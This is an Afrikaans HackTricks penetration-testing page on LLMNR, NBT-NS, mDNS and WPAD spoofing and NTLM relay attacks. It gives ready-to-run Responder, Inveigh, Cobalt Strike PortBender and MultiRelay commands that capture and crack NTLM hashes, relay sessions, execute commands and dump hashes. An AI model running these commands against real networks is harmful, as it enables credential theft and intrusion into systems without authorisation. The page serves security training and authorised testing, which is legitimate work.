9.6 KiB
Spoofing LLMNR, NBT-NS, mDNS/DNS en WPAD en Relay-aanvalle
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.
Netwerkprotokolle
Plaaslike Gasresolusieprotokolle
- LLMNR, NBT-NS en mDNS:
- Microsoft en ander bedryfstelsels gebruik LLMNR en NBT-NS vir plaaslike naamresolusie wanneer DNS misluk. Soortgelyk gebruik Apple- en Linux-stelsels mDNS.
- Hierdie protokolle is vatbaar vir onderskepping en vervalsing as gevolg van hul ongeagte, uitsaai-aard oor UDP.
- Responder kan gebruik word om dienste na te boots deur vervalsde antwoorde na gasheerstelsels te stuur wat hierdie protokolle ondervra.
- Verdere inligting oor diensnabootsing met behulp van Responder is beskikbaar hier.
Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD maak dit vir webblaaier moontlik om outomaties proksi-instellings te ontdek.
- Ontdekking word fasiliteer deur middel van DHCP, DNS, of terugval na LLMNR en NBT-NS as DNS misluk.
- Responder kan WPAD-aanvalle outomatiseer deur kliënte na skadelike WPAD-bedieners te rig.
Responder vir Protokolvergiftiging
- Responder is 'n hulpmiddel wat gebruik word vir die vergiftiging van LLMNR-, NBT-NS- en mDNS-navrae, selektief antwoord gee op navraagtipes en hoofsaaklik op SMB-dienste teiken.
- Dit is vooraf geïnstalleer in Kali Linux en kan gekonfigureer word by
/etc/responder/Responder.conf
. - Responder vertoon gevangenome wagwoorde op die skerm en stoor dit in die
/usr/share/responder/logs
-gids. - Dit ondersteun beide IPv4 en IPv6.
- 'n Windows-weergawe van Responder is beskikbaar hier.
Uitvoering van Responder
- Om Responder met verstekinstellings uit te voer:
responder -I <Interface>
- Vir meer aggressiewe ondersoek (met potensiële newe-effekte):
responder -I <Interface> -P -r -v
- Tegnieke om NTLMv1-uitdagings/antwoorde vir makliker kraak vas te vang:
responder -I <Interface> --lm --disable-ess
- WPAD-nabootsing kan geaktiveer word met:
responder -I <Interface> --wpad
- NetBIOS-navrae kan na die aanvaller se IP opgelos word, en 'n outentiseringsproksi kan opgestel word:
responder.py -I <interface> -Pv
DHCP-vergiftiging met Responder
- Die vervalsing van DHCP-antwoorde kan 'n slagoffer se roeteringinligting permanent vergiftig en bied 'n stilistiese alternatief vir ARP-vergiftiging.
- Dit vereis presiese kennis van die konfigurasie van die teikennetwerk.
- Uitvoering van die aanval:
./Responder.py -I eth0 -Pdv
- Hierdie metode kan effektief NTLMv1/2-wagwoorde vasvang, maar dit vereis sorgvuldige hantering om netwerkversteuring te voorkom.
Vasvang van Gelde met Responder
- Responder sal dienste naboots deur die bogenoemde protokolle te gebruik en gelde (gewoonlik NTLMv2-uitdaging/antwoord) vasvang wanneer 'n gebruiker probeer outentiseer teenoor die vervalsde dienste.
- Pogings kan aangewend word om af te gradeer na NetNTLMv1 of ESS uit te skakel vir makliker kraak van gelde.
Dit is van kritieke belang om daarop te let dat die gebruik van hierdie tegnieke wettig en eties moet geskied, met behoorlike magtiging en sonder versteuring of ongemagtigde toegang.
Inveigh
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi-spanne, ontwerp vir Windows-stelsels. Dit bied funksionaliteite soortgelyk aan Responder, wat vervalsing en man-in-die-middel-aanvalle uitvoer. Die hulpmiddel het ontwikkel vanaf 'n PowerShell-skripsie na 'n C#-binêre, met Inveigh en InveighZero as die hoofweergawes. Gedetailleerde parameters en instruksies kan gevind word in die wiki.
Inveigh kan bedryf word deur middel van PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Of uitgevoer as 'n C# binêre lêer:
Inveigh.exe
NTLM Relay-aanval
Hierdie aanval maak gebruik van SMB-verifikasiesessies om toegang tot 'n teikermasjien te verkry en verleen 'n stelselskulp as dit suksesvol is. Sleutelvereistes sluit in:
- Die verifiserende gebruiker moet plaaslike administratiewe toegang tot die herleide gasheer hê.
- SMB-ondertekening moet gedeaktiveer wees.
445 Poort deurstuur en tonneling
In situasies waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 deurgestuur en getunnel word. Hulpmiddels soos PortBender help om poort 445-verkeer na 'n ander poort om te lei, wat noodsaaklik is wanneer plaaslike administratiewe toegang vir bestuurderlaaiing beskikbaar is.
PortBender-opstelling en bedryf in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Ander Hulpmiddels vir NTLM Relay-aanval
- Metasploit: Stel op met proksi's, plaaslike en afgeleë gasheerbesonderhede.
- smbrelayx: 'n Python-skrips vir die oordra van SMB-sessies en die uitvoering van opdragte of die implementering van agterdeure.
- MultiRelay: 'n Hulpmiddel uit die Responder-pakket om spesifieke gebruikers of alle gebruikers te oordra, opdragte uit te voer of hase te dump.
Elke hulpmiddel kan gekonfigureer word om deur 'n SOCKS-proksi te werk as dit nodig is, wat aanvalle selfs met indirekte netwerktoegang moontlik maak.
MultiRelay-bedryf
MultiRelay word uitgevoer vanuit die /usr/share/responder/tools gids en teiken spesifieke IP-adresse of gebruikers.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Hierdie gereedskap en tegnieke vorm 'n omvattende stel vir die uitvoering van NTLM Relay-aanvalle in verskillende netwerkomgewings.
Dwang NTLM-aantekeninge af
In Windows kan jy dalk sommige bevoorregte rekeninge dwing om te verifieer teen willekeurige masjiene. Lees die volgende bladsy om te leer hoe:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Verwysings
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy in HackTricks wil adverteer of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.